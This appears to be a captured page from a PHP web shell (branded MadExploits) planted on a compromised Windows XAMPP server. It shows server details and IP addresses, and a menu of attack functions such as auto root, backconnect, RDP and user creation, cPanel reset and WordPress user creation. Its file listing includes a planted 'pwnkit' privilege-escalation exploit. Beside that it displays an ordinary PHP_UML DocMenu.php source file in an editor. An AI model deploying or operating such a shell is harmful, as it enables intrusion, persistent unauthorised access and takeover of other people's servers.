Windows NT IZOXMIX7871CBCZ 6.3 build 9600 (Windows Server 2012 R2 Datacenter Edition) AMD64
Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
: 172.23.17.241 | : 216.73.216.139
Cant Read [ /etc/named.conf ]
8.2.12
Administrator
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
[ C ]
C: /
xampp /
php /
pear /
PHP /
UML /
Output /
HtmlNew /
[ HOME SHELL ]
Name
Size
Permission
Action
$resources
[ DIR ]
drwxrwxrwx
templates
[ DIR ]
drwxrwxrwx
.mad-root
0
B
-rw-rw-rw-
DocClass.php
1.33
KB
-rw-rw-rw-
DocClassifier.php
7.3
KB
-rw-rw-rw-
DocDatatype.php
1.37
KB
-rw-rw-rw-
DocElement.php
12.08
KB
-rw-rw-rw-
DocIndex.php
5
KB
-rw-rw-rw-
DocInterface.php
1.36
KB
-rw-rw-rw-
DocMenu.php
4.1
KB
-rw-rw-rw-
DocPackage.php
4.18
KB
-rw-rw-rw-
DocResources.php
1.76
KB
-rw-rw-rw-
Exporter.php
3.33
KB
-rw-rw-rw-
adminer.php
465.43
KB
-rw-rw-rw-
pwnkit
10.99
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : DocMenu.php
<?php /** * PHP_UML * * PHP version 5 * * @category PHP * @package PHP_UML * @author Baptiste Autin <ohlesbeauxjours@yahoo.fr> * @license http://www.gnu.org/licenses/lgpl.html LGPL License 3 * @version SVN: $Revision: 176 $ * @link http://pear.php.net/package/PHP_UML * @since $Date: 2011-09-19 00:03:11 +0200 (lun., 19 sept. 2011) $ */ /** * Implementation of the HTML renderer for the treeview menu (on the left panel) * * @category PHP * @package PHP_UML * @subpackage Output * @subpackage HtmlNew * @author Baptiste Autin <ohlesbeauxjours@yahoo.fr> * @license http://www.gnu.org/licenses/lgpl.html LGPL License 3 */ class PHP_UML_Output_HtmlNew_DocMenu extends PHP_UML_Output_HtmlNew_DocElement { /** * Generates and saves the HTML menu * * @param PHP_UML_Metamodel_Package $p Starting package */ public function render($p) { $tpl = $this->getTemplate(self::MENU_FILENAME.'.'.self::FILE_EXT); $str = '<ul class="TreeView" id="MainList">'; $str .= $this->getContent($p); $str .= '</ul>'; $str = str_replace('#MENU', $str, $tpl); $this->save(self::MENU_FILENAME, $str); } /** * Returns the HTML content for a whole model * * @param PHP_UML_Metamodel_Package $p Starting package * * @return string */ private function getContent(PHP_UML_Metamodel_Package $p) { return $this->getPackage($p); } /** * Returns the HTML content for a given package * * @param PHP_UML_Metamodel_Package $p Package * @param string $path Relative path to the current package * @param int $level Recursion level * * @return string */ private function getPackage(PHP_UML_Metamodel_Package $p, $path='', $level=0) { $pt = $level>0 ? 'package' : 'model'; $empty = (count($p->nestedPackage)==0 && count($p->ownedType)==0 && count($p->ownedOperation)==0 && count($p->ownedAttribute)==0); $str = ($level==0 ? '<li class="Expanded">' : ($empty ? '<li>' : '<li class="Collapsed">')); $str .= '<a href="'.$path.self::PACKAGE_FILENAME.'.'.self::FILE_EXT.'" class="'.$pt.'" target="main">'.$p->name.'</a>'; if (!$empty) { $str .= '<ul>'; foreach ($p->nestedPackage as $np) { $npDir = $path.$np->name; $str .= $this->getPackage($np, $npDir.'/', $level+1); } foreach ($p->ownedType as $c) { $str .= $this->getClassifierItem($c, $path, $level); } foreach ($p->ownedAttribute as $a) { $str .= $this->getPackagePropertyItem($a, $path); } foreach ($p->ownedOperation as $o) { $str .= $this->getPackageOperationItem($o, $path); } $str .= '</ul>'; } $str .= '</li>'; return $str; } protected function getPackagePropertyItem(PHP_UML_Metamodel_Property $p, $path) { return '<li>'. '<a href="'.$path.self::PACKAGE_FILENAME.'.'.self::FILE_EXT.'#'.$this->generatePropertyId($p). '" class="property" target="main">'.$p->name.'</a>'. '</li>'; } protected function getPackageOperationItem(PHP_UML_Metamodel_Operation $o, $path) { return '<li>'. '<a href="'.$path.self::PACKAGE_FILENAME.'.'.self::FILE_EXT.'#'.$this->generateFunctionId($o). '" class="method" target="main">'.$o->name.$this->getParameterList($o).'</a>'. '</li>'; } protected function getClassifierItem(PHP_UML_Metamodel_Classifier $c, $path, $level) { $str = ''; if ($level>0 || !in_array($c->name, $this->hiddenClassifiers)) { $str .= '<li>'. '<a href="'.$path.self::getObjPrefix($c).$c->name.'.'.self::FILE_EXT. '" class="'.self::getObjStyle($c); if ($c->isAbstract) $str .= ' abstract'; $str .= '" target="main">'.$c->name.'</a></li>'; } return $str; } } ?>
Close